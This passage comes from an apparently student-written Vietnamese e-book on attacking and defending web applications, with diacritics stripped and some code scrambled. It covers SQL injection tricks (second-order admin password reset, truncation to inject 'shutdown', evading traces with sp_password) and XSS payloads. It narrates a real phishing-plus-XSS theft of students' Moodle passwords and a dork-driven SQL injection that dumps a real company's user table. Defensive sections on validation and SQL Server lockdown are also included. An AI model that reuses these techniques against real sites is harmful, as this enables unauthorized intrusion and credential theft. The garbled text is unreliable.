Username: admin'
Password: passofadmin
- ng dng s thay th du nhy, kt qu trong cu insert s nh sau:
INSERT into User VALUES(123, 'admin''--', 'password',0xffff) (nhng trong c
s d liu s lu l admin--)
- Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m ASP
c thit k m bo rng ngi s dng phi nhp ng mt khu c trc khi nhp
mt khu mi. on m nh sau:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username
+ "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
- Cu truy vn thit lp mt khu mi nh sau:
sql {
= "update users set password = '" + newpassword + "' where username= '" +
rso("username") + "'"
rso(username) chnh l gi tr username c c cu truy vn login v n l admin-Cu truy vn lc ny nh sau:
update users set password = 'password' where username = 'admin'--'
- Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh. y l 1
trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c s dng c ch
loi b d liu. Gii php tt nht l loi b nhng gi tr li hn l chnh sa li.
Nhng c mt vn l c mt s nhp d liu (nh nhp tn) cho php nhng k
t ny. V d: OBrien.
- Cch tt nht gii quyt vn ny l khng cho php nhp du nhy n. Nu
iu ny khng th thchin c , th loi b v thay th nh trn. Trong trng hp
ny, cch tt nht l m bo tt c d liu c a vo cu truy vn SQL (k c
nhng gi tr trong c s d liu) phi c kim sot mt cch cht ch.

Tav4 Bkav Forum

Trang 38

[E-book] Tan cong va phong thu ung dung WEB

Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng cch gii
hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s kiu tn cng khng
th thc hin c nhng vn c ch h hacker li dng.
V d b.2:
Gi s c username v password u b giihn ti a l 16 k t.Nhp:
Username: aaaaaaaaaaaaaaa
Password :; shutdown-ng dng s thay th mt du nhy n bng hai du nhy n nhng do chiu di
chui b gii hn ch l 16 k t nn du nhy n va c thm s b xo mt. Cu
lnh SQL nh sau:
Select * from users where username=aaaaaaaaaaaaaaa and
password=; shutdown
kt qu l username trong cu lnh c gi tr l:
aaaaaaaaaaaaaaa and password=
iiiii.3. Trnh s kim sot:
- SQL server c mt giao thc kim sot cht ch bng h hm sp_traceXXX, cho
php ghi nhn nhiu s kin xy ra trong c s d liu. c bit l cc s kin T-SQL,
ghi nhn li tt c cc cu lnh SQL thc hin trn Server. Nu ch kim sot c
bt th tt c cc cu truy vn SQL ca hacker cng b ghi nhn v nh m mt
ngi qun tr c th kim sot nhng g ang xy ra v nhanh chng tm ra c gii
php. Nhng cng c mt cch chng li iu ny, bng cch thm dng
sp_password vo cu lnh T-SQL, v khi gp chui ny th vic kim tra s ghi
nhnnh sau:
-- sp_password was found in the text of this event.
-- The text has benn replaced with this comment for security reasons.
ngay c khi sp_password xut hin trong phn ch thch. V th du tt c cu
truy vn tn cng, ch cn n gin l thm sp_password vo sau -- nh sau:
2.3.2.Cch Phng Trnh SQL Injection
- Nh vy, c th thy li SQL injection khai thc nhng bt cn ca cc lp trnh
vin pht trin ng dng web khi x l cc d liu nhp vo xy dng cu lnh
SQL. Tc hi t li SQL injection ty thuc vo mi trng v cch cu hnh h
thng. Nu ng dng s dng quyn dbo (quyn ca ngi s hu c s d liu owner) khi thao tc d liu, n c th xa ton b cc bng d liu, to cc bng d
liu mi, Nu ng dng s dng quyn sa (quyn qun tr h thng), n c th iu

Tav4 Bkav Forum

Trang 39

[E-book] Tan cong va phong thu ung dung WEB

khin ton b h qun tr c s d liu v vi quyn hn rng ln nh vy n c th
to ra cc ti khon ngi dng bt hp php iu khin h thng ca bn.
Trong hu ht trnh duyt, nhng k t nn c m ho trn a ch URL trc khi
c s dng.
Vic tn cng theo SQL Injection da vo nhng cu thng bo li do vic
phng chng hay nht vn l khng cho hin th nhng thng ip li cho ngi dng
bng cch thay th nhng li thng bo bng 1 trang do ngi pht trin thit k mi
khi li xy ra trn ng dng.
Kim tra k gi tr nhp vo ca ngi dng, thay th nhng k t nh ; v..v.. Hy
loi b cc k t meta nh ',",/,\,; v cc k t extend nh NULL, CR, LF, ... trong
cc string nhn c t:
o d liu nhp do ngi dng trnh
o cc tham s t URL
o cc gi tr t cookie
i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hin cu
truy vnSQL, hoc dng ISNUMERIC chc chn n l mt s integer.
Dng thut ton m ho d liu
i. Kim tra d liu
- Kim tra tnh ng n ca d liu l 1 vn phc tp v thng cha c quan
tm ng mc trong cc ng dng. Khuynh hng ca vic kim tra tnh ng n ca
d liu khng phi l ch cn thm mt s chc nng vo ng dng, m phi kim tra
mt cch tng qut nhanh chng t c mc ch.
- Nhng tm tt sau y s bn v vic kim tra tnh ng n ca d liu, cng vi
v d mu minh ho cho vn ny.
C ba gii php tip cn vn ny:
1) C gng kim tra v chnh sa lm cho d liu hp l.
2) Loi b nhng d liu bt hp l.
3) Ch chp nhn nhng d liu hp l
Gii php 1: kh thc hin
- Th nht, ngi lp trnh khng cn thit phi bit tt c d liu bt hp l, bi v
nhng dng d liu bt hpl rt a dng.
- Th hai, l vn ca trng hp b tn cng 2 tng (second-oder SQL
injection) trong vic ly d liu t h thng ra.
Gii php 2: b v hiu trong cc trng hp nh gii php 1 l do :
- D liu bt hp l lun lun thay i v cng vi vic pht trin cc kiu tn
cng mi.
Gii php 3: tt hn hai gii php kia, nhng s gp mt s hn ch khi ci t.
- Cch bo mt tt nht l kt hp c gii php 2 v 3. Mt v d cho s cn thit
kt hp 2-3 l du ni gia h v tn Quentin Bassington-Bassington phi cho php
Tav4 Bkav Forum

Trang 40

[E-book] Tan cong va phong thu ung dung WEB

du gch ngang trong b nh ngha d liu hp l, nhng chui k t -- l mt chui
k t c bit trong SQL server.
- V d nu c b lc :
+ Lc b nhng d liu bt hp l nh --,select v union
+ Mt hm kim sot loi b du nhy n th c th i ph nh sau.
union select @@version-- Mt s cch ci t cc chc nng kim tra d liu c bn
Cch 1: T chi d liu bt hp l
function validate_string( input )
known_bad = array("select","insert", "update", "delete", "drop","--",
"'" )
validate_string = true
for i = lbound( known_bad ) to ubound( known_bad )
if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
validate_string = false
exit function
Cch 2: Thay th du nhy n:
end if
functionnext
escape( input )
input = replace(input, "'", "''")
end function
escape = input
Cch 3: Ch chp nhn d liu hp l
end function
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123
456789"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
Tav4 Bkav Forum

next

Trang 41

[E-book] Tan cong va phong thu ung dung WEB

ii. Kho cht SQL Server (SQL Server Lockdown)

y l mt danh sch cc cng vic cn lm bo v SQL server:
Xc nh cc phng php kt ni n server:
o Dng tin ch Network Utility kim tra rng ch c cc th vin mng ang
dng l hoat ng.
Kim tra tt c cc ti khon c trong SQL Server
o Ch to ti khon c quyn thp cho cc ng dng
o Loi b nhng ti khon khng cn thit
o m bo rng tt c ti khon c mt mt khu hp l,
Kim tra cc i tng tn ti
o Nhiu extended stored procedure c th c xo b mt cch an ton.
Nu iu ny c thc hin, th cng nn xem xt vic loi b lun nhng tp tin
.dll cha m ca cc extended stored procedure
o Xo b tt c c s d liu mu nh northwind v pubs
o Xa cc stored procedure khng dng nh: master..xp_cmdshell, xp_startmail,
xp_sendmail, sp_makewebtask
Kim tra nhng ti khon no c th truy xut n nhng i tng no
o i vi nhng ti khon ca mt ng dng no dng truy xut c s d
liu th ch c cp nhng quyn hn cn thit ti thiu truy xut n nhng i
tng n cn dng. Kim tra lp sa cha ca server
o C mt s cch tn cng nh buffer overflow, format string thng ch
n lp bo v ny.
Kim tra cc phin lm vic trn server
Thay i "Startup v chy SQL Server" mc ngi dng quyn hn thp trong
SQL Server Security.
- Nhn xt:
+ Qua phn tm hiu v SQL Injection,cng thy rng vic kim tra d liu
trc khi x l l cn thit.
+ ng dng ngoi vickim tra tnh ng n ca d liu, cn m ha d liu
ngay bn trong c s d liu v khng cho xut trang Web li, bo ni dung li c
php SQL hacker khng th thu thp thng tin c s d liu.

Tav4 Bkav Forum

Trang 42

[E-book] Tan cong va phong thu ung dung WEB

- Song song l cng vic ca ngi qun tr mng.
iii. Thit lp cu hnh an ton cho h qun tr c s d liu
- Cn c c ch kim sot cht ch v gii hn quyn x l d liu n ti khon
ngi dng m ng dng web ang s dng. Cc ng dng thng thng nn trnh
dng n cc quyn nh dbo hay sa. Quyn cng b hn ch, thit hi cng t.
Ngoi ra trnh cc nguy c t SQL Injection attack, nn ch loi b bt k thng
tin k thut no cha trong thng ip chuyn xung cho ngi dng khi ng dng c
li. Cc thng bo li thng thng tit l cc chi tit k thut c th cho php k tn
cng bit c im yu ca h thng.
2.4. Cross Site Scripting (XSS)
2.4.1. Tn cng XSS
- Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht hin
nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi cc nh
pht trin web v c nhng ngi s dng web. Bt k mt website no cho php
ngi s dng ng thng tin m khng c s kim tra cht ch cc on m nguy
him th u c th tim n cc li XSS.
- Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh
nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng
cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng
on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong
, nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site
Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML.K thut
tn cng XSS nhanh chng tr thnh mt trong nhng li ph bin nht ca Web
Applications v mi e do ca chng i vi ngi s dng ngy cng ln. Ngi
chin thng trong cuc thi eWeek OpenHack 2002 l ngi tm ra 2 XSS mi. Phi
chng mi nguy him t XSS ngy cng c mi ngi ch hn.
2.4.1.1. Hot ng ca XSS:
- V c bn XSS cng nh SQL Injection hay Source Injection, n cng l cc yu
cu (request) c gi t cc my client ti server nhm chn vo cc thng tin
vt qu tm kim sot ca server. N c th l mt request c gi t cc form d
liu hoc cng c th ch l cc URL nh l

Tav4 Bkav Forum

Trang 43

[E-book] Tan cong va phong thu ung dung WEB

http://www.example.com/search.cgi?query=<script>alert('XSS

was

found !');</script>
- V rt c th trnh duyt ca bn s hin ln mt thng bo "XSS was found !". Cc
on m trong th script khng h b gii hn bi chng hon ton c th thay th
bng mt file ngun trn mt server khc thng qua thuc tnh src ca th script. Cng
chnh v l m chng ta cha th lng ht c nguy him ca cc li XSS.
- Nhng nu nh cc k thut tn cng khc c th lm thay i c d liu ngun
ca web server (m ngun, cu trc, c s d liu) th XSS ch gy tn hi i vi
website pha client m nn nhn trc tip l nhng ngi khch duyt site . Tt
nhin i khi cc hacker cng s dng k thut ny deface cc website nhng
vn ch tn cng vo b mt ca website. Tht vy, XSS l nhng Client-Side Script,
nhng on m ny s ch chy bi trnh duyt pha client do XSS khng lm nh
hng n h thng website nm trn server. Mc tiu tn cng ca XSS khng ai
khc chnh l nhng ngi s dng khc ca website, khi h v tnh vo cc trang c
cha cc on m nguy him do cc hacker li h c th b chuyn ti cc website
khc, t li homepage, hay nng hn l mt mt khu, mt cookie thm ch my tnh
bn c th s b ci cc loi virus, backdoor, worm
2.4.1.2. Cch tn cng
i. Scan l hng XSS cua ng dng web
- Cch 1: S dng nhiu chng trnh d qut li ca ng dng web, v d nh
chng trnh Web Vulnerability Scanner d qut li XSS.
- Cch 2: Thc hin 5 bc:
Bc 1: M website cn kim tra
Bc 2: Xc nh cc ch (phn) cn kim tra XSS. 1 Site bt k bao gi cng
c cc phn:
Search, error message, web form. Ch yu li XSS nm phn ny, ni chung
XSS c th xy ra ch no m ngi dng c th nhp d liu vo v sau nhn
c mt ci g . V d chng ta nhp vo chui XSS
Bc 3: Xc minh kh nng site c b li XSS hay khng bng cch xem cc
thng tin tr v. V d chng ta thy th ny: Khng tm thy XSS , hay l Ti
khon XSS khng chnh xc, ng nhp vi XSS khng thnh cng th khi
kh nng ch b dnh XSS l rt cao.
Bc 4: Khi xc nh ch c kh nng b dnh li XSS th chng ta s chn
nhng on code ca chng ta vo th tip, v d nh sau:

Tav4 Bkav Forum

Trang 44

[E-book] Tan cong va phong thu ung dung WEB

Chn on code ny: < script>alert('XSS')< /script> vo b li v nhn nt
Login, nu chng ta nhn c mt popup c ch XSS th 100% b dnh XSS.
Nhng xin ch , thnh thong vn c trng hp website b dnh XSS nhng vn
khng xut hin ci popup th buc lng bn phi VIEW SOURCES (m bng) n ra
xem . Khi view sources nh kim dng ny < script>alert('XSS)< /script> , nu c
th ht chy , XSS y ri.
Gi http://doannguyennganh.com/index.php l site b dnh li XSS v ta tm
c ni b li nh th ny : http://doannguyennganh.com/index.php?page=<script...</
script> , ngha l ta c th chn code ngay trn thanh ADDRESS.
Bc 5: Ln k hoch kch bn tn cng
ii. Tn cng
- Tht ra th c rt nhiu k thut tn cng da trn li XSS ny, ch yu l sau khi
bit cch tm l hng th mi ngi s c mt mu m cho cch tn cng ca mnh.
y mnh xin gii thiu n cc bn mt k thut m mnh thc hin thnh cng
trn trang moodle ca khoa cng ngh thng tin KHTN. K thut n cp password.
- Sau khi xc minh mt iu chc chn rng trang moodle b li XSS ch ng
nhp
- Ti lp tc vit ngay mt ng dng nh ri up ln mt ci host free, ng dng ny
s c nhim v nhn thng tin v mssv v password gi v v ghi xung file txt. Cn
nhn th no th mi cc bn xem tip... Sau :
Bc 1: Ti to mt mail gi dng ni l: Din n tuyn dng ca Intel, mi
cc bn no quan tm th tham gia.Ri to ra mt ci ng link gi:
http://doannguyennganhgia.com/index.php nhng ti l reference n ti mt ci trang
gi ca tui. Trong tch tc trang ny s gn mt ci on script c c nhim v ly v
username v password sau khi ng nhp v gn vo ci trang tht(V trang tht b li
XSS nn cho php chng ta gn m c ln, gn y c ngha l khi chng ta view
source code ca trang ln, chng ta s thy c mt on script ca chng ta nm u
), ri sau redirect sang trang tht ngay lp tc khi b nghi ng.
Bc 2: Ngi dng vo mail, tng tht, click vo link v thy chy ng
trang moodle (H u ng rng, trang tht b gn m c ln, trong thi gian qu
nhanh nn h khng nghi ng g c, nhng nu ai s thy link khng ng).
Bc 3: H ng nhp, khi ng dng s chy bin dch t trn xung, v tt
Tav4 Bkav Forum

Trang 45

[E-book] Tan cong va phong thu ung dung WEB

nhin s chy lun c script m chng ta ci, khi MSSV v password s c ly
v gi cho mt ci trang trn server m chng ta dng ra.
Bc 4: ng dng server ca ta nhn c mssv v password, ghi ra file txt.
Bc 5: Kt thc qu trnh tn cng, chng ta c mt danh sch cc ti khon
ca sinh vin.
2.4.2. Phng chng.
- Nh cp trn, mt tn cng XSS ch thc hin c khi gi mt trang web
cho trnh duyt web ca nn nhn c km theo m script c ca k tn cng. V vy
nhng ngi pht trin web c th bo v website ca mnh khi b li dng thng qua
nhng tn cng XSS ny, m bo nhng trang pht sinh ng khng cha cc tag ca
script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi dng hoc
m ha(endcoding) v lc cc gi tr xut cho ngi dng.
2.4.2.1. Lc
- Lun lun lc cc d liu nhp t pha ngi dng bng cch lc cc k t meta (k
t c bit) c nh ngha trong c t ca HTML. Mi trng nhp liu bao gm c
tham s lin kt s c kim tra pht hin cc th script.
2.4.2.2. M ha
- Li XSS c th trnh c khi my ch Web m bo nhng trang pht sinh c
m ha (encoding) thch hp ngn chy chy cc script khng mong mun.
- M ha pha my ch l mt tin trnh m tt c ni dung pht sinh ng s i qua
mt hm m ha ni m cc th script s c thay th bi m ca n.
- Ni chung, vic m ha(encoding) c khuyn khch s dng v n khng yu
cu bn phi a ra quyt nh nhng k t no l hp l hoc khng hp l.Tuy nhin
vic m ha tt c d liu khng ng tin cy c th tn ti nguyn v nh hng n
kh nng thc thi ca mt s my ch

Tav4 Bkav Forum

Trang 46

[E-book] Tan cong va phong thu ung dung WEB

CHNG 3
DEMO, NH GI V HNG PHT TRIN TI
3.1. Demo
- Trc tin ta s dng mt th thut tm kim nh trn google c th tm kim
site b li SQL Injecton. y ti dng t kha: inurl:keywords
V d: inurl:sanpham.php?id=3
- S dng t kha trn google.com ti chn c mt website thit k s si l
http://nhanquynhphat.com/sanpham.php?id=3 ; ti on n b dnh li SQL Injetion v
tin hnh khai thc li.
- Ti tin hnh kim tra li v thy website ny b li SQL Injection, ti tip tc ly
cc thng tin v website nh version MySQL vic khai thc tr nn r rng hn.
y website s dng version MySQL >=5 nn ti c th d dng khai thc li thng
qua information_shema.tables m khng cn phi on table ca n l g.

Hnh 13. Thng tin cc table ly c.

- B qua cc table khng lin quan ta ly c cc table nh sau: khuyenmai, lienhe,
loaispcon, online, sanpham, tbl_gioithieu, tbl_lienhe, tbl_lienket, tbl_tintuc,
thanhtoan, tintuc, user
- Sau ti tin hnh ly thng tin column v data v kt qu nh hnh 14.

Tav4 Bkav Forum

Trang 47

[E-book] Tan cong va phong thu ung dung WEB

Hnh 14. D liu ta khai thc c dng m ha

- Theo hnh 14. d liu ly c ang dng m ha. Vic khai thc SQL Injection
n y cn 1 bc na l tm ng dn ng nhp qun tr v nu mt khu nm
dng m ha th ta cn phi tin hnh gii m.
3.2. Kt lun
3.2.1. Cc vn t c
- Theo yu cu t ra ban u th cho n thi im hin ti, n t c cc
ni dung sau:
Tm hiu cc k thut tn cng ng dng Web bao gm cc k thut
o Chn m lnh thc thi trn trnh khch Cross-site Scripting.
o Chn cu truy vn SQL v Tn cng SQL Injection nng cao
o Tn cng Local Acttack.
o T chi dch v .
Cc bin php bo mt t s kt hp gia nh qun tr mng, nh thit k ng dng
Web v ngi dng
o Kim tra mt trang Web c kh nng b tn cng bng nhng k thut chn
cu lnh SQL, thay i tham s hay khng.
o C th phng chng c cc li tn cng thng dng hin nay, nh cc vn
tm hiu trn.

Tav4 Bkav Forum

Trang 48

[E-book] Tan cong va phong thu ung dung WEB

3.2.2. Hn ch
Trong qu trnh lm n c rt nhiu ti liu ti tm kim tuy c mc ch l ging
nhau song li c phng php khc nhau hon ton.Ti c gng tm hiu thm v
chng nhng khng khi c nhiu sai st
3.2.3. Hng pht trin ti
Trong phm vi n chuyn ngnh, t c cc yu cu t ra.
Bn thn c nhn em xin xut hng pht trin n m rng hn v s c gng
pht trin thm nhng ni dung sau:
Tm hiu thm v cc k thut tn cng a ra phng php bo mt ng
dng Web mc su hn.
Tm hiu v vn bo mt su hn, khng ch dng mc mt ng dng
Web m pht trin hn vn bo mt cc h thng mng v dch v.
Khai trin chng trnh pht hin l hng tt hn, trn nhiu phng din k
thut.

TI LIU THAM KHO

A. Ti liu Ting Vit:
[1] Tn cng t chi dch v Dos,Ddos,DRDos. Tc gi Ng.Ng.Thanh Ngh-HVA
[2] Bi ging An Ninh Mng.Tc gi GV.Nguyn Anh Tun-Trung tm TH-NN Tr
c
[3] Li bo mt trn ng dng web v cch khc phc.Tc gi ng Hi Sn-Trung
tm ng cu khn cp my tnh Vit Nam
[4] Tn cng kiu SQL Injection-Tc hi v phng trnh. Tc gi L nh Duy-Khoa
CNTT-Trng H Khoa Hc T Nhin TP.HCM
Tav4 Bkav Forum

Trang 49

[E-book] Tan cong va phong thu ung dung WEB

[5] Web Application Attack & Defense. Tc gi V Thng-Trung tm An ninh
mng Athena
[6] XSS c bn. Tc gi Mask-NBTA
B. Ti liu Ting Anh:
[7] SQL Injection-Are you web Applications vulnerable. Author Kevin Spett
[8] An Introduction to SQL Injection Attacks For Oracle Developers.Author Stephen
Kost
[9] How to Attack and fix Local File Disclosure. Author Sangteamtham
C. Ti liu internet:
[10]http://thuvienkhoahoc.com/wiki/K%C4%A9_thu%E1%BA%ADt_t%E1%BA
%A5n_c%C3%B4ng_CROSS-SITE_SCRIPTING
[11]http://vi.wikipedia.org/w/index.php?title=Th%E1%BB%83_lo%E1%BA%A1i:T
%E1%BA%A5n_c%C3%B4ng_t%E1%BB%AB_ch%E1%BB%91i_d%E1%BB
%8Bch_v%E1%BB%A5&action=edit&redlink=1
[12]http://www.hvaonline.net/hvaonline/posts/list/6720.hva;jsessionid=38F900726E07
641F712734A3B2A6F2EC
[13]http://www.ddcntt.vn/forum/showthread.php?t=14
[14]http://ttgtc.com/forum/showthread.php?1385-T%C3%ACm-hi%E1%BB%83u-v
%E1%BB%81-t%E1%BA%A5n-c%C3%B4ng-t%E1%BB%AB-ch%E1%BB%91i-d
%E1%BB%8Bch-v%E1%BB%A5-DoS&s=c580b874a6ea05d220258132c9cef9e3

NHN XT HNG DN
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
Tav4 Bkav Forum

Trang 50

[E-book] Tan cong va phong thu ung dung WEB

..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................

NHN XT PHN BIN

..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................
..............................................................................................................................

Tav4 Bkav Forum

Trang 51